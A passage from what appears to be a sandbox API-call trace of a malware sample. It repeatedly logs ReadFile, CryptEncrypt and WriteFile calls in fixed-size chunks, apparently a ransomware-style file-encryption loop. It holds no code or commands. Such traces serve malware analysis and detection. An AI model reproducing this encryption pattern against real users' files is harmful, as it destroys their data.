lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.515] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.515] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.515] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.515] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.515] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.515] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.515] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.515] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.515] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.515] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.515] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.515] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.515] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.515] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.516] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.516] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.516] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.516] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.516] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.516] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.516] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.516] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.516] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.516] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.516] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.516] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.516] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.516] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.516] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.516] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.516] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.517] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.517] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.517] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.517] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.517] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.517] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.517] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.517] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.517] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.517] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.517] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.517] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.517] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.517] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.517] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.517] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.517] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.517] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.518] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.518] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.518] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.518] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.518] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.518] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.518] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.518] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.518] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.518] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.518] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.518] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.518] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.518] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.518] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.518] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.519] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.519] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.519] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.519] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.519] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.519] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.519] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.519] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.519] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.519] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.519] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.519] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.519] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.519] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.519] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.520] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.520] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.520] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.520] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.520] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.520] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.520] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.520] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.520] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.520] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.520] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.520] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.520] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.520] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.520] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.520] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.520] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.521] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.521] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.521] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.521] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.521] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 